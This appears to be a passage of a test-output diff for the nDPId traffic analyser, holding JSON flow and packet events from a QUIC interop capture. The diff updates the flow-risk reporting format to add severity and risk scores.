yS6mffzxUsj35+UHRRyp7PYmh1cC9qTzCEsRA7CjRwHLjqXJ\/bFB2ydqN23sLpT9nS4qU4QS\/HV6Wwrx0WtQFBbsfAW3fUZkAAZCl13hpQUwFlYp1jVMEWAMYBq5YiQtqre2ANV2GA425sm0cmnAEoAPOvqCelpE6WxYBAjJ6Ob9xQn5fw5KtiH1vTt2jIzGqg7h7x+eEG7EtskR3WXy2ULpj8avtEHxoIAYNFuma3Kw1Q5I+yp3gZXvCg80hvQ5yvTMTRFEFLv7e3AI9MWK1ez\/Gs92MjqKDjcFapzN8J0ncdbpf7VMM\/SAAAyn39VVA2B0eImPwbFAkVPm6q7XMvwTw43gkYyH+tIZCaiByTp2fz7f13zt5uWkHJ\/xdDxZ0QWMsgr23LTh8uX0dAi+gTSxGMdGZ+JMlIsaX0oCPfGb0HHLtAsXQYqZ0ZWPw28mWBYTpruOoNFb3DlX+6qExjK8WSy1ooe5+wJKkueb4Xmv\/UjHpZRrauceITr70pDmM\/h\/qmPnCS6hmsP17czX\/4rm35DUjFnD5mDlo+Qvw14FGc0FaI4S4lHwDgjoDtx1uxn3T6ZBIvh7IG+k1Jkwrdejn5+rYQQ7D+n0F6ra8Kary+Yp6IxTLgWMA39l4flYecvLvLbyaihe+bxuZ\/sXW44m\/I+rkIqDYksSpmtNCQoAiuTEaO8+G9TYcOPSiueZiWcspgw=="}
-00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434743,"flow_last_seen":1603816434743,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434743,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":48644,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"pandora.cm.in.tum.de","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01005{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434743,"flow_last_seen":1603816434743,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434743,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":48644,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"pandora.cm.in.tum.de","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434743,"flow_last_seen":1603816434743,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434743,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":42468,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02148{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1603816434743,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434743,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAP7ZAAEAR7R\/AqAGAilu8k6XkEVEE7HdHzAoKCgoIR0aH1pvahxkAAETSPnSjK947ByD+BwPD1aG8hiXIT+yh1\/\/dJPToYueaTYmcm5W39inFapwMfwXtPNuHyuKzvQi4tEhoFP7o5cr7L\/YLfOvRTXCcf\/nBs2i0GOysW2g+q+ySQiTJnXYhgdgzrVd+5t3w\/PQw6fy9t\/m\/yds5zVgFZvkcK9+PBnMGkX69jNHZy\/lqJ01nDFjal9f8GD69jzEKMTGYvMSJQA7RNeC\/KD8eOpHjj9WBygsq6CUYIr8fo6US3BfgPq9gd0A0tmwg39CMW8XvWjfxQE42A0qdKexPHBHbO44RrgN1lYWHsF9KHFf0oG1zpJP\/biAOd06E+L4G8kH7VJLNs7ScFYpQk1sjfWbopJV2NDDRk5n\/u159T7mAS9TPir6Mkav0xo3zJWRpgX5F8BCPA+wy2ILkS4PSS1v0MrOJCoimlv1DqJ5OlW084DnCjwz8IJMv\/SKXa7+4NnVr\/\/ESvUHOac9wGGR1zXP9FI\/x3cL3p4u9H6RWhCPW4QyjHaemmC\/gfB\/0E+a4D2sYjszc275uEiiMk9YkT5MYHrBeYLCaU7Q8DxDwccUne3cpoJ4lHHcYLSLAlSL\/\/KY7h+VxvR+zoxuGflSDjAs1poqdo\/IUube0PEi4UTgbHuGAtXxbtiHSdrpAoua4+6szPVBhRGKex4yMRpVhbH8S+dN3Pyg3B24A0\/OVSzrM5pnJd27z5j0Gd+CA6I3BX8Yp+2hPRnK41jUW3bVktO7edHptm5sFjlFYICv0SOarAbQ6n2DmwLm92sqQh3QS9Lmm4WOx2XCagFIPZIDiZeLTTkq+aszsag6ixBzFj1pcSsByUB\/GhjosZxT0Gj4yUoAQIHzUTJg7J3nKc68zoJAksRF0IX4lzCTP2m7zWWuJzrV47gUbv+qb40KFRAbhbw5Dyw8fAJ3D9TlnxYIcqnqk4LMimkerR+VyVCXS\/6WHTRMPm4MtIHNddK1\/U\/48s6JsJR68VJBGumfircAqWj50LwIeATognNP1DIA70mG9JvdMDmO2oTwy6ySJN4Y3y06X7q3Z8NCtiC\/iI2uhGloDLFxuymBLemWj0VpyeCZG0yIpqIc1HEmv6XKNmjw7z8uZ8Y5Cfh3l0rF5wkKZKiS1xmPWaos69hnGAavOUwNzlyVD3k8VynbijwHzavIsoRY3BLDI4EUCUOPCvrOJTxW67HBmCCikO43iO+akkrn7xaV4Xo\/zs2kx7KWcSSCAiFYi2fQxAO4dtBo2lzxCU5sDKZWyE2j\/3FtfwJAdNdp2IztD++HqzRoQ387gULsMy0sNutEk1+pbY\/0fe+lCMT8UDYTOJkXwNxjYJql09DmDSST+acm9N1pvUw5rNb4b3q6LcSzpLxBR68KiN6n1WdGdEBNNLh4GVDxkIJvPtKALCuwiML8mF7tHe9HaxwxTrg\/pGssCVS5xDRj73Jovu\/IOG05VG5UNPKU18Acro3NlKckFYERDjRmsoE81UwYtkwm7N7d2F1WbVoupTw027C7AT7qM8FKZYTL16DfcvuloswPjS71+3GJDR59F44OqreAhoGhdcp+Xh8QSIYeTsyxnGWk0kqW4A4ueD9T9D7LMkceoPCCE+H9fBRiJlRLBVUKyk4ZJsKg4xzaX\/xksDV8yz35z5z93CJ\/IWw=="}
-00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434743,"flow_last_seen":1603816434743,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434743,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":42468,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"quic.westus.cloudapp.azure.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01023{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434743,"flow_last_seen":1603816434743,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434743,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":42468,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"quic.westus.cloudapp.azure.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 02140{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1603816434745,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434745,"pkt":"pJGxgjQ5PKn0qB\/sht1gBnpkBNgRQCABCwcKydWupNP+R2kegH0kAIkCAAAAAPA8kf\/+aaRU25URUQTY3a\/ICgoKCgj9UoceU8iiQAAARL6ASJxduLYM4xsAvBTFbnnnMgyZmTRslgR5MTLzlGRvRpNyp8S8YSqhWi2EmIsbwpUo7wbHPWhyFPr99JEnZIlhcjYPyxEGseCwFKnV2A0\/LB+svcKwvaZro6Z2b6a5Qb2NXM0oceBQSsPvPMg08kktxPj6SOee45akgVhY4DzKTwOEuk83sHBjlwEQifFccsbM9rqqjEuAyt6JNZnZPoxNz1G+S71LAyfhU0K8u707IjCNbt043hVKiDAAP5Ls\/kOK5\/P5wqDCSLczv4J+lN2F6A33FYO\/MH2HOQiHb42Npm0EKTL+3SUNLPF87XHIdatFGKqcZkjBNCnSSbcZX2rEd6EUtj2nyhPr+r+nFeDhikrv+PxIFsc4VtD7WW0xDr26dPr5aSb061H45m8ZE0qNRBQR5tFZnbTGbyvde2q0Qpki81IBl6UJt1pUmavS5bxq5HrjSyr+NuMKr1axIeHUWwVKneV0bHR+2mJcQo9V+yDL+oVm6ynfkdvz+nfkBGIwjGTvIVMQdFq8yx2LVqO\/qhKk6WPhCoWu9SDfjAy3GRJgBH2n4\/AbuSFWy2FX3xB+FF8PVmqqU3lrXAwclcYyJxho6IWefEErywTT+xmJJToC+y\/V9RX\/POWQWAr70juowrxsRoO0Y3cHtF1mRnK77ko\/Z2bo+32+o7WcpTcj05oFRjeFzF\/bQhzfov7nC9AvF49NZTgKdU080+rsO\/a47JDDU9xRZIAdg7wur3suP\/23X5uAgAdvy9UfsMqaYaHuALSqzHmgmG+LU\/6oOzEiGUuM8xxO480fAsxJEYsa6aGv2IZSIrscvxw7PTjaAwUenIyoO3VqZ+CINAlZcJTfYDfC9Hoc9OdcdGsqCYKUW2wEzwexc9d2EUKPuBdQN2dXat5aWucUNWLDcCZgqT4lbJEnTA2hr0ad5eSaqS6BfcqZWuOLYKUHB67L8Lmnq2zuNtqKmvXXpYPuIvpGFWs7G7GD6CQFOGRklyTm3tEhq+17muIZPvSti1DEepk\/jf609KGeKiujNRiayZCXOCYOzkT28aBRRNckMsvT0LKNcigIKfjCDjIrh9aBkhLcgwpdGyl0y0h5hzDf\/4VXIhtMY0ORmfK1bAFgAlZBgLLfAp9\/vELXdZmlDRSB768DANFA4iwCGp8+E5loZtSnwVUJwBA4KRJzszszKovh\/eLZuleX\/lWlVGnatUN4nwRXaA1HElTOEdLlw6fZcHl\/Bdp4mHTJ8y+9+pA69KKpbmTruDVoXYkxoxHu9SNP1A3\/1SU74fa+4vsnpiYx3onvBAsr5gEzR0pL43F78fgO+m6gor7Et7VdeE4b0ZBmKRybKRoGjfTeCumdBa1nXpC30UmUVAo+zHRyQ1fZ2xkGMwXeR8l2HdsJlr15wXYvnfd6lL7qDoJjy440fHRTo9Bsr\/clAcx+A\/nz+C5jTYcda4m99NqYRLQUmM0ojNMm3OJF4cbzbp6ia5SamPyogQ1msqIhDfkv9Q2tHko55jTHfOK86Fc81Rz9PlrSPeKqSQiDiYO0Ad6xLICN\/o4TcHWtv1wNgnzDEw5LNMuaUGnl4D4FXXeGTZ793MSG1gIEgmaX3GvG52P40BhE04PqAmddEQ=="}
 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1603816434749,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"ts_msec":1603816434749,"pkt":"PKn0qB\/spJGxgjQ5ht1gCsonACMRMSABGfAABQwhVAAB\/\/4zO5YgAQsHCsnVrqTT\/kdpHoB9EVGzHAAjCaG2AAAAAAAI2i99jGY\/xbL\/AAAd\/wAAHP8AABs="}
 02145{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1603816434750,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434750,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUA8Y1AAEAREMTAqAGAR8opqZMdEVEE7OQ\/wwoKCgoIqaWx\/UJ+JLQAAETSC8vS9NYx\/piHxwl8s8tPMp6kRvO2UBaRMuZHcUr7jludPMV53ZjKHSEyJP+9E8\/YwfQgCjydB0456RwGo1\/cbqx+RH1Q8+a1Bo1DdJBYSWHzgdWM0CbI8YB14t04OHAilhwb5MlDY0NSInVq7T8MAzGcexUB7xgxT3QdMV0ajcdAA4QbbUxGpL\/JsbBCdpMKcKPK2DVQFnN0kkOHn9OlQg4o9cA4XLljFnTIscrDUPaU8cEzYClT6gYQP2jfUUOYkMZZULYk5bpXO7ax5xa50czA2ls0cdXBQf7YUbq+XEnU8cGtnVcx69nAz\/CACNjhFN4oROsXXKDcRVVrHQlIHQT9PZ1APNWYKwMR9C2+9u8dIrhct2cOe+7nRU5qzDx+30cas94Oc2UBgVvL4WrIGpSaoUpJWOS0GeDoGOZ\/NWWg33pgJHnq+fY7ZzZHaHkXZjK77y1bAHB5Tr17hCnN5b0yRFsFoYe9i3Wjp9k8hE3VZmn0SbrwA2HbX31Rwes9jjmIw\/os2DIcecacn2FrvDVlDqA+PQeIAXs\/2y71axQ4RLDic1gPyOF1NF3TOt80pLqz6lBzfCDO3rQH87n\/FiG2UQCjXUWyj00vQBE0K4S49nrAnDyF86E+RmqfHyjAEU7mfiLFjvU+SSLwbi\/fJZjzvnUDZSqjvi6f0IiNao51VPDI0VABW13IqPcImOawEl8JX5u0SQuxZjMaB+gkN47AMk5gGVpUcxeJ7Z9XwIs0K0lZDbqGWCXMCdIud52cUv5Q7a4BkzKCwhQfbEBvI2t+x0ewDQFUYQ17Lne1\/93MxOPU47Wf8TBSnv+VQbWOxLdCg2nECwvv8CsEtJFeZWh\/ha1cf4fZct1vISvq8GJAxKd76jGaP\/45zQLjR4HASo2rVXFn0L\/ETUkSvIfvqvSOkP0YtSO\/ZLn52LtlBuvcA71G0tQ37DmpzKxqMVV6sHgX3+zStA9c6eE7Wp\/gkgIS2yyC89rXKte79UGlVKqDYHmP54LWQ33xn\/ghDB5Udev516Q4LJ\/LYK1naDjh4zdtyWDOyHtV6dDjzohTwANBgk7tTb8qpeFDkvo\/5XKUnTRyFT6z1vDtwXisGZ3PyPwdthxyiwl227D+CWkoTh6C7df5\/ykCgFfvvCvgoQH8u8rshHs55PKOGBg5Hqs5deERSp3QXO5XGtS3KFrfrVEg6HdcbkCxSBW6ksxlYLzTFTTuuN3qPrqUBpBL+bmMKRSiOP1Qzjapvnxaf9gMa1yPSmZaOdEDbYJpPK7oha37il+Yc\/Ki35zS\/SKKrO9P2OR76tBQ1tVYddL33Ezyaaiyq3JlG\/nwWmfV5D2y+Js0\/lW0oPF+SLaGcNUfweLLinRJd+WusXgPVh9RJ+wX\/ykCIdqWlM284dJEMxAAj6BoI4wNZMRXYMh7U0nrCrpYSTFx7EaqFBm7HBPZbeFEUO8nxhWclcKvpJfe5Sf5yDohJz\/1ozHUKuzC9D3+QBJjDqURTWaAew7pm4H1KncN+qU8PnTQKXvs8sV4kCe3iQ+i0\/nVCMUjviEYY1\/hUg1AA4cxVLMRpwljkJ+SrVfWXClIk9dlebLFDCqTEzVG8u0wwo9BmMF63RqgLA7RedBbfzfYGr0pGXf\/l2NvPGQXqdbLDg=="}
 00637{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434750,"flow_last_seen":1603816434750,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434750,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":38689,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02140{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1603816434750,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434750,"pkt":"pJGxgjQ5PKn0qB\/sht1gAfkDBNgRQCABCwcKydWupNP+R2kegH0gARnwAAUMIVQAAf\/+MzuWlyERUgTYFmvNCgoKCgjw7KzpNo8oeAAARL4tqmRQ5KPAPbdPUnedDn077kKWSLkPygVEwdGpIVFWcp2en9F3ERED+OnUg3d8i8AAkr44lz5aAq3LC+Q212cavhgupcuDcqNoIGhnCIfm+QSZcdNZ4zXfagNI0pLJoRsvOsL\/uXGYxbmgqR94yTDxQ0eUCVIZASIUeRZjEvJCthWVFT2rgBlBR7LYtLcvCmtn0DIMTAiPE\/xh01OGF5bAJQ2pznCPuONfdxbRDf26\/K7Vorl6tUQm\/NY5ROm8iHLzI4aMVUF0HjSu3+YUC1uhFUVddfTvpusRwaZ7kJNAa7P\/Vy96rw+N1QmHoKrViF3SiU98y7yZQbZlWxDFuBm3kfHuLnWeUnH4lwkgdmjgDw\/tGYT9JNO+a4WXT0WG+E149U5CDNgHVyClW14kVzq2L5mwgYWZMAo+lEamoeJB5h9+NMm0nQlLQivIZYDxop0vohOxK5n93lmaDplwC7Jat5ImroXJjGBA1i\/wWMXgstJIth+GejqRDCbbbeG7NxvZ9rVNx+l6f970K8CtZlugC3GRbFE9tMsDJl5zdBgPz83kXeLW4WfxGljbZ2I1\/Fsv5Dj9XTubdhAYt4ThM0knFSb5aX6Ff26rVq4Lfqy9HtKxEerRRn\/GPQ4yjlBfNoPdWIbjRC7TEbcUSnLf\/aCaXXZvuxf7r562GmcMeGxyHBQBVeTMDY1abEs7sWm\/+SOMgorJmIj9ISqcpplInrkBzayKhF83lHHurhCA1lrKNlSdpeepOLCf\/jMxhKTDSGOt6PuvUNMjvuJNj7JdWjB1qgt+7yg6GfadVoLlc7oKEmP2EZkbg1reAwAQOQU0SIVyNqN7R8++hQVFb9WO4t2FPgkjCkOeg8PKyC0+NKn6ths3s033xQ7XDByeP8Nn2kj5mf2ZY2gISmQLZEcrz0CUqG\/ia+5tqLKj4+\/Cndt6cFxpPnK+zzcl+5uVQbgnRXQJmrxZO\/AIu15jMIC2BXo7iG1s9T31lFVuK8ZWVw0cL8LlBKwlz8kc+VhdGPCJrGwt3wYzDhn2EetnDAIMnbnceC6ASm4ceWPn7zfseGSdZHnqg2ItW2chn2XlcQp4yI6MIqqKBep7wjkYIzq1Xg27JeDrqOB5eSz5nPdiU3VaODgQWCUUbg9ghrJZfwLkGvswGRALf+EzPBVkuJnFi0tcoasUB17bL2uvxmMJsQHWFO1QguLm7aeVi4DCA7LeprVfnREJzlwtTcq1k5DYJjUcopXIzceZ1RbGyvZp4+Cg3kMpFGVYKly62GUic6\/xL1lutLalr\/JjiJp45zRjU0jch7XG6sx+An4xZJK0US\/g0Kv\/HVtYynUrwZXu\/woHqvI9+NK8siaNZbHMUKRkIGOXCg9aT\/yvWLUSR9BuvtiEH\/8yVs7NtMMrdgpTQTivJT44BZN6SO0WXldGZUkYPP9OVZchj36EQYpACosyteNK+R\/3v7MWWO4pEsgkp64XBxw2OWJLRgsbR2Yz5fH7LkIbs0gEHDj7\/gcfuV5kb5ePRim1rmsSUQI+hvJlOF3Hyyb3A9HUl2d7fhX4v+4KZIvtThVaEaIsqv89pcU+EoZuJG6wojlAyR0dhaUyj7ezXTuA25fYN0yKiGFN29BfWA=="}
-00929{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434750,"flow_last_seen":1603816434750,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434750,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":38689,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.tech","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01038{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434750,"flow_last_seen":1603816434750,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434750,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":38689,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.tech","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 02141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1603816434750,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434750,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUANsZAAEARy4vAqAGAR8opqZMLAbsE7Ok\/zAoKCgoINqH1Vk80LhQAAETSoI4wdjcpvn01GyYGcs8WSPSlKPT4hY9r7ZqPT9FILv6mf0g+Sw+ruXz256wKfDlVUbQnhrO+J2WPPYXirISnHdW5UejVo+0GNbGGC7pxqEcspy5a\/AJGn9AlGBaUXuFdjU97Kn6GHsNBd6bdZ3+SRnRxnNzx3oqxje3M74CutehdUh9SD+lH8Ub\/n5kiikOxdihmi26CPsVygaeEpmQ\/ctjlgUeWzXeW6BI5VBRC\/SBTjQ1Jm5WM7UYSJc7206JIZFbkts5ijN4IYXYCa6dQPxtIUWKXQ3dvfDY7hKCYqYb0oQk8vNpd+VxLZ+X2tKF+cUI8Vxl+uQ1cyS7KRBFhSWWakuw6JqnPtneYuh2X0FsZcDWbR4iGUWVWgDg9Qw5cfvrP12Y\/yiLSLAGuKBuRr+bvLEH8tSrJRasEnvugWyA7qLDfZYZJnvH+JBBq7\/aECFTncu7StDcd8mUbn9I9AidCbV\/bMYXQlnSnKDQulxvXQ4dbJwT\/tlwiGidqTTeBgir9P1P3PCQxKDec98Req33hD33Pl1kOhW47JhAzt2PSVpD5yGFmdTiUtav0ZVZ4bVttJ50pPh0rwKfk06rey\/iamM+sc2+SMdjSdewqGqL+SInrOte3Zwu6gGMBTDH1Dyn1E0nmn0Tb\/Q1gEjU93vGLNsvKan5nMFqYWW2NNsruGSJ+9aJA9OOwdQMWK3sGUohqhR5oMULjwJwWB4Co1NNGczoGoTZkPBosjx1u8umd4oTn1Z2YEOsfq\/MS16\/Yc6JAedu\/au3dMTV8zUcm9uBg2LvP4HCYefsbA+hZ3OpRlBsm8QE5VwJdjLl9s5rMN33d4LYFMCKrf6QdIGj5c4fUlmgpdRq+dBGaSuAfzg0ku6d1UCGoNDQKc7loJPuEMWGVQQa3mEV9T3wFWWD6qST\/etOV4D\/sj1plYn1+smnFQBuQZSbZweVdNYukikzA14A8nweXxSHltQyCOoXoXsTnOodIRecC5axLme+KFXLONSqcF7oL989dNvADyfgfXeWjM56pSGw8v1frDP2WvRz\/9O2VASdSPymmk7eOvVaojgAkCWc585MWwdlDf2Bq\/0Eu3MuR5eBJAaTZqNMwminLUZSdyoyjLlJm2rZrJBLuK2gyXgKALsphtbmnZoJqw6TqoTKjr8UYtnFpWqENJDhQ5+ORa2Hcbq\/Dt4PwTSt+rPvIoSh7Jaterb+RkztGN0uVdPoKTy77oy3I5gH\/ftpi+zlnKzZWJcJk7cxUnYiLi2m\/syIsVA+rAGJ4eeYI0XnnqQO4AvGYQTCUgtaiahKO7UOHl88kFcJG4D8pQg2wwb5607JGDUPMhSYXsNIwTaOjnaJDy919gMoDn26JaGel3R8iazejn1O\/DzxXDINb0MonstAugqKgKVKjzgLZ\/csTsyHaMRIb0aSATuia50Le8I3Ve5TbTrO\/bIUVjBtgTrRKF9beL0OL2aHMhnVOyvZCYm2Rfh+hzhENK+ndpIFgdC09Qc1PCFaAc\/iWtEnOkRAICRVP\/n2wewDV4ofdczPB2YLwTo\/A4bp3k9J39KVcL+jkeKQH9hK9CryMQU2J\/VOD96l9ePlxO+jxkFCQ59EYKnbqkDYSz689nm86kaU5Ehu7UNB2XjaenWSjg+6wrw=="}
 02144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1603816434752,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434752,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAU1dAAEARXy7AqAGAjOM0XJOYAbsE7NI+zwoKCgoI8EYvtCcjifcAAETSbBDdIICaEFzEG1iH2xrezIkmzc81Se7Om4pMqi+fkG1ee5cmCW03EDIZCCsKAvFcaFK0xOPuVpbYZPxd25c0VKDC2\/IuslwjOlp8bug5TVX8ayHsiTo+lsvxl1UQybYSPktQa6tD8aJ1SYoje\/TUY\/5v\/R2x3Qgs8EMkrwm3yX346YWdgmSm1p7ceKPEy+zG5LRvC9shuVP1fHGwJ+1fA5BlvICvwLYIOkfS5qSoKKUy0u4Zz9f3Dl8wvOnZhXCK6i8j4NlIpdZHu5RJiAsAZ4LK1nC+Hkny64Ae6XYMfX+bXXmhr20i5ZKonuPmoXhEkpwdnfR7Q+F6EhXJUuuaYdMH\/IWPcTw7L1PQOQRTBPiChmKn